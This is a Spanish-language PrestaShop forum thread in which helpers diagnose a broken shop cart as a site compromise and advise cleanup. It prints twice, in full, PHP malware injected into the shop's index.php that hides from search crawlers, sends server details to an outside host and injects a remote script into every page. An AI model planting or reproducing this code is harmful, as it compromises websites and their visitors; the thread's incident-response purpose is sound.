César68 Posted September 10, 2014 Share Posted September 10, 2014 (edited) Muy buenas: Antes me iba bien pero al actualizar ahora al añadir al carrito me sale lo siguiente: Impossible to add the product to the cart os dejo imagen para que podais ver todo lo que sale. Alguna solución? Gracias (No se lo que me pasa pero ultimamente me va todo mal) Edited September 11, 2014 by César68 (see edit history) Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 10, 2014 Share Posted September 10, 2014 (edited) Es raro.. no se si sera que tienes algún fichero "corrupto" (o eres victima de algún ataque..) pero te añade <script type="text/javascript" src="http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294"></script> al final y te salta el errror de javascript Mira el fichero blockcart-json.tpl que se encuentra en el módulo blockcart. si ves algo raro al final substituyelo por el que viene de serie P.ej https://github.com/PrestaShop/blockcart/blob/master/blockcart-json.tpl Edited September 10, 2014 by Enrique Gómez (see edit history) Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 10, 2014 Share Posted September 10, 2014 En realidad <script type="text/javascript" src="http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294"></script> te lo añade en todas las páginas .. no se mira el .htaccess Link to comment Share on other sites More sharing options...
César68 Posted September 10, 2014 Author Share Posted September 10, 2014 En realidad <script type="text/javascript" src="http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294"></script> te lo añade en todas las páginas .. no se mira el .htaccess sobre cambiar el archivo por el que viene de serie no me deja,y sobre lo del htacess que tendria que mirar? Gracias Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 11, 2014 Share Posted September 11, 2014 Copia y pega el htaccess aquí o adjuntalo Link to comment Share on other sites More sharing options...
César68 Posted September 11, 2014 Author Share Posted September 11, 2014 Copia y pega el htaccess aquí o adjuntalo # ~~start~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again # .htaccess automaticaly generated by PrestaShop e-commerce open-source solution # http://www.prestashop.com - http://www.prestashop.com/forums <IfModule mod_rewrite.c> <IfModule mod_env.c> SetEnv HTTP_MOD_REWRITE On </IfModule> # Disable Multiviews Options -Multiviews RewriteEngine on RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule . - [E=REWRITEBASE:/] RewriteRule ^api/?(.*)$ %{ENV:REWRITEBASE}webservice/dispatcher.php?url=$1 [QSA,L] # Images RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$1$2$3.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$1$2$3$4.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$1$2$3$4$5.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$1$2$3$4$5$6.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$1$2$3$4$5$6$7.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$1$2$3$4$5$6$7$8.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$7/$1$2$3$4$5$6$7$8$9.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$7/$8/$1$2$3$4$5$6$7$8$9$10.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^c/([0-9]+)(\-[\.*_a-zA-Z0-9-]*)(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/c/$1$2$3.jpg [L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^c/([a-zA-Z_-]+)(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/c/$1$2.jpg [L] # AlphaImageLoader for IE and fancybox RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^images_ie/?([^/]+)\.(jpe?g|png|gif)$ js/jquery/plugins/fancybox/images/$1.$2 [L] # Dispatcher RewriteCond %{REQUEST_FILENAME} -s [OR] RewriteCond %{REQUEST_FILENAME} -l [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^.*$ - [NC,L] RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$ RewriteRule ^.*$ %{ENV:REWRITEBASE}index.php [NC,L] </IfModule> <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/gif "access plus 1 month" ExpiresByType image/jpeg "access plus 1 month" ExpiresByType image/png "access plus 1 month" ExpiresByType text/css "access plus 1 week" ExpiresByType text/javascript "access plus 1 week" ExpiresByType application/javascript "access plus 1 week" ExpiresByType application/x-javascript "access plus 1 week" ExpiresByType image/x-icon "access plus 1 year" </IfModule> FileETag INode MTime Size <IfModule mod_deflate.c> <IfModule mod_filter.c> AddOutputFilterByType DEFLATE text/html text/css text/javascript application/javascript application/x-javascript </IfModule> </IfModule> #If rewrite mod isn't enabled ErrorDocument 404 /index.php?controller=404 # ~~end~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 11, 2014 Share Posted September 11, 2014 Esta bien el htaccess... Lo que esta claro es que cualquier petición (que no sea cargar contenido estático) acaba añadiendote ese código javascript al final puedes poner el fichero index.php de la raiz de la instalación? Link to comment Share on other sites More sharing options...
César68 Posted September 11, 2014 Author Share Posted September 11, 2014 Esta bien el htaccess... Lo que esta claro es que cualquier petición (que no sea cargar contenido estático) acaba añadiendote ese código javascript al final puedes poner el fichero index.php de la raiz de la instalación? ok te lo mando.Gracias por todo. Un saludo <?php /* * 2007-2013 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2013 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); Dispatcher::getInstance()->dispatch(); #8557cd# if( empty( $sh ) ) { if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match( "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'] ) ) { } else { error_reporting( 0 ); @ini_set( 'display_errors', 0 ); if( !function_exists( '__url_get_contents' ) ) { function __url_get_contents( $remote_url, $timeout ) { if( function_exists( 'curl_exec' ) ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $remote_url ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout ); curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds $_url_get_contents_data = curl_exec( $ch ); curl_close( $ch ); } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) { $ctx = @stream_context_create( array( 'http' => array( 'timeout' => $timeout, ) ) ); $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx ); } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) { $handle = @fopen( $remote_url, "r" ); $_url_get_contents_data = @stream_get_contents( $handle ); } else { $_url_get_contents_data = __file_get_url_contents( $remote_url ); } return $_url_get_contents_data; } } if( !function_exists( '__file_get_url_contents' ) ) { function __file_get_url_contents( $remote_url ) { if( preg_match( '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches ) ) { $protocol = strtolower( $matches[1] ); $host = $matches[2]; $path = $matches[3]; } else { // Bad remote_url-format return false; } if( $protocol == "http" ) { $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout ); } else { // Bad protocol return false; } if( !$socket ) { // Error creating socket return false; } $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n"; $len_written = @fwrite( $socket, $request ); if( $len_written === false || $len_written != strlen( $request ) ) { // Error sending request return false; } $response = ""; while( !@feof( $socket ) && ( $buf = @fread( $socket, 4096 ) ) !== false ) { $response .= $buf; } if( $buf === false ) { // Error reading response return false; } $end_of_header = strpos( $response, "\r\n\r\n" ); return substr( $response, $end_of_header + 4 ); } } if( empty( $__var_to_echo ) ) { $sh = "http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php"; $sh09['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME']; $sh09['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME']; $sh09['HTTP_HOST'] = $_SERVER['HTTP_HOST']; $sh09['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS']; $sh09['SERVER_NAME'] = $_SERVER['SERVER_NAME']; $sh09['SERVER_ADDR'] = $_SERVER['SERVER_ADDR']; $sh09['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN']; $sh = __url_get_contents( $sh . "?fid=13994820&info=" . http_build_query( $sh09 ) . "&no=1", 1 ); $sh = "<script type=\"text/javascript\" src=\"http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294\"></script>"; echo $sh; } } } #/8557cd# Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 11, 2014 Share Posted September 11, 2014 efectivamente te han "hackeado" el sitio. El fichero debe quedar solo con <?php /* * 2007-2013 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.or...ses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2013 PrestaShop SA * @license http://opensource.or...ses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); Dispatcher::getInstance()->dispatch(); Link to comment Share on other sites More sharing options...
galindogadea Posted September 11, 2014 Share Posted September 11, 2014 ok te lo mando.Gracias por todo. Un saludo <?php /* * 2007-2013 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2013 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); Dispatcher::getInstance()->dispatch(); #8557cd# if( empty( $sh ) ) { if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match( "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'] ) ) { } else { error_reporting( 0 ); @ini_set( 'display_errors', 0 ); if( !function_exists( '__url_get_contents' ) ) { function __url_get_contents( $remote_url, $timeout ) { if( function_exists( 'curl_exec' ) ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $remote_url ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout ); curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds $_url_get_contents_data = curl_exec( $ch ); curl_close( $ch ); } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) { $ctx = @stream_context_create( array( 'http' => array( 'timeout' => $timeout, ) ) ); $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx ); } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) { $handle = @fopen( $remote_url, "r" ); $_url_get_contents_data = @stream_get_contents( $handle ); } else { $_url_get_contents_data = __file_get_url_contents( $remote_url ); } return $_url_get_contents_data; } } if( !function_exists( '__file_get_url_contents' ) ) { function __file_get_url_contents( $remote_url ) { if( preg_match( '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches ) ) { $protocol = strtolower( $matches[1] ); $host = $matches[2]; $path = $matches[3]; } else { // Bad remote_url-format return false; } if( $protocol == "http" ) { $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout ); } else { // Bad protocol return false; } if( !$socket ) { // Error creating socket return false; } $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n"; $len_written = @fwrite( $socket, $request ); if( $len_written === false || $len_written != strlen( $request ) ) { // Error sending request return false; } $response = ""; while( !@feof( $socket ) && ( $buf = @fread( $socket, 4096 ) ) !== false ) { $response .= $buf; } if( $buf === false ) { // Error reading response return false; } $end_of_header = strpos( $response, "\r\n\r\n" ); return substr( $response, $end_of_header + 4 ); } } if( empty( $__var_to_echo ) ) { $sh = "http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php"; $sh09['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME']; $sh09['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME']; $sh09['HTTP_HOST'] = $_SERVER['HTTP_HOST']; $sh09['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS']; $sh09['SERVER_NAME'] = $_SERVER['SERVER_NAME']; $sh09['SERVER_ADDR'] = $_SERVER['SERVER_ADDR']; $sh09['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN']; $sh = __url_get_contents( $sh . "?fid=13994820&info=" . http_build_query( $sh09 ) . "&no=1", 1 ); $sh = "<script type=\"text/javascript\" src=\"http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294\"></script>"; echo $sh; } } } #/8557cd# Pues parece que ahí tienes el problema, dejalo como viene por defecto: <?php /* * 2007-2014 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to [email protected] so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <[email protected]> * @copyright 2007-2014 PrestaShop SA * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require(dirname(__FILE__).'/config/config.inc.php'); Dispatcher::getInstance()->dispatch(); Link to comment Share on other sites More sharing options...
galindogadea Posted September 11, 2014 Share Posted September 11, 2014 Ups, ha contestado Enrique Gomez, en el mismo minuto, no me salto su mensaje y no me di cuenta....(pido perdon) Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 11, 2014 Share Posted September 11, 2014 Mirate este post http://www.prestashop.com/forums/topic/322456-help-prestashop-malwarevirus/ En principio cuando un sitio ha sido infectado, lo ideal sería bajarse el sitio entero al disco duro y comparar con la carpeta de un prestashop (misma versión) limpio con una herramienta tipo beyondcompare o winmerge para ver cambios en los ficheros para detectar código infectado. Por supuesto cambiar todos los passwords de ftp..etc Y estar al tanto por si el agujero de seguridad viene por el hosting. Es una putada y es más habitual de lo que parece. Link to comment Share on other sites More sharing options...
César68 Posted September 11, 2014 Author Share Posted September 11, 2014 Mirate este post http://www.prestashop.com/forums/topic/322456-help-prestashop-malwarevirus/ En principio cuando un sitio ha sido infectado, lo ideal sería bajarse el sitio entero al disco duro y comparar con la carpeta de un prestashop (misma versión) limpio con una herramienta tipo beyondcompare o winmerge para ver cambios en los ficheros para detectar código infectado. Por supuesto cambiar todos los passwords de ftp..etc Y estar al tanto por si el agujero de seguridad viene por el hosting. Es una putada y es más habitual de lo que parece. Gracias,por si acaso cambiaré las contraseñas, Por cierto,cambié el archivo y si que ahora va bien,pero al cambiarlo me desaparacieron todas las imagenes del slider..... tiene algo que ver? Link to comment Share on other sites More sharing options...
Enrique Gómez Posted September 11, 2014 Share Posted September 11, 2014 No creo... Si das el tema como solucionado, edita el titulo del tema, editando el primer mensaje, pulsando en editar, y después en "Usar editor completo", añadiendo la palabra "Solucionado" al titulo. Y si te he ayudado dale al like Saludos 1 Link to comment Share on other sites More sharing options...
César68 Posted September 11, 2014 Author Share Posted September 11, 2014 No creo... Si das el tema como solucionado, edita el titulo del tema, editando el primer mensaje, pulsando en editar, y después en "Usar editor completo", añadiendo la palabra "Solucionado" al titulo. Y si te he ayudado dale al like Saludos Lo del slider era otra cosa de mi navegador. Muchas gracias por todo y doy el tema por solucionado. Un saludo Link to comment Share on other sites More sharing options...
Recommended Posts